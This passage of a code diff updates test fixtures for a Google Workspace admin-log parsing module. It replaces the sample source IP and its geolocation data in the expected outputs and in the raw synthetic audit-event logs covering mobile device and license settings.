+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -174,7 +162,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"CHANGE_LICENSE_AUTO_ASSIGN\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"CHANGE_LICENSE_AUTO_ASSIGN\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -188,26 +176,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 1398,
+ "log.offset": 1395,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -228,7 +212,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_REASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_REASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -243,27 +227,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 1854,
+ "log.offset": 1850,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "user"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -287,7 +267,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_LICENSE_REVOKE\",\"parameters\":[{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_LICENSE_REVOKE\",\"parameters\":[{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -301,26 +281,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 2359,
+ "log.offset": 2354,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -341,7 +317,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_REVOKE\",\"parameters\":[{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_REVOKE\",\"parameters\":[{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -355,27 +331,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 2812,
+ "log.offset": 2806,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "user"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -399,7 +371,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"UPDATE_DYNAMIC_LICENSE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"UPDATE_DYNAMIC_LICENSE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -414,26 +386,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 3276,
+ "log.offset": 3269,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-mobile-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-mobile-test.json.log
index 69c376c4453a..67fb978c2592 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-mobile-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-mobile-test.json.log
@@ -1,31 +1,31 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"ACTION_CANCELLED","parameters":[{"name":"ACTION_ID","value":"id"},{"name":"ACTION_TYPE","value":"ACCOUNT_WIPE"},{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"ACTION_REQUESTED","parameters":[{"name":"ACTION_ID","value":"id"},{"name":"ACTION_TYPE","value":"ACCOUNT_WIPE"},{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"ADD_MOBILE_CERTIFICATE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_CERTIFICATE_COMMON_NAME","value":"name"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_DEVICES_BULK_CREATION","parameters":[{"name":"NUMBER_OF_COMPANY_OWNED_DEVICES","intValue":10}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_OWNED_DEVICE_BLOCKED","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_DEVICE_DELETION","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_OWNED_DEVICE_UNBLOCKED","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_OWNED_DEVICE_WIPED","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_APPLICATION_PERMISSION_GRANT","parameters":[{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"GROUP"},{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"NEW_PERMISSION_GRANT_STATE","value":"GRANTED"},{"name":"OLD_PERMISSION_GRANT_STATE","value":"DENIED"},{"name":"PERMISSION_GROUP_NAME","value":"LOCATION"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_APPLICATION_PRIORITY_ORDER","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"REMOVE_MOBILE_APPLICATION_FROM_WHITELIST","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"ORG_UNIT"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_APPLICATION_SETTINGS","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"ORG_UNIT"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"ADD_MOBILE_APPLICATION_TO_WHITELIST","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"ORG_UNIT"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_APPROVE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_BLOCK","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_DELETE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_WIPE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_ADMIN_RESTRICTIONS_PIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_WIRELESS_NETWORK","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"ADD_MOBILE_WIRELESS_NETWORK","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"REMOVE_MOBILE_WIRELESS_NETWORK","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_WIRELESS_NETWORK_PASSWORD","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"REMOVE_MOBILE_CERTIFICATE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_CERTIFICATE_COMMON_NAME","value":"cert"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"ENROLL_FOR_GOOGLE_DEVICE_MANAGEMENT"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"USE_GOOGLE_MOBILE_MANAGEMENT"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_NON_IOS"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_IOS"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_ACCOUNT_WIPE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_CANCEL_WIPE_THEN_APPROVE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_CANCEL_WIPE_THEN_BLOCK","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
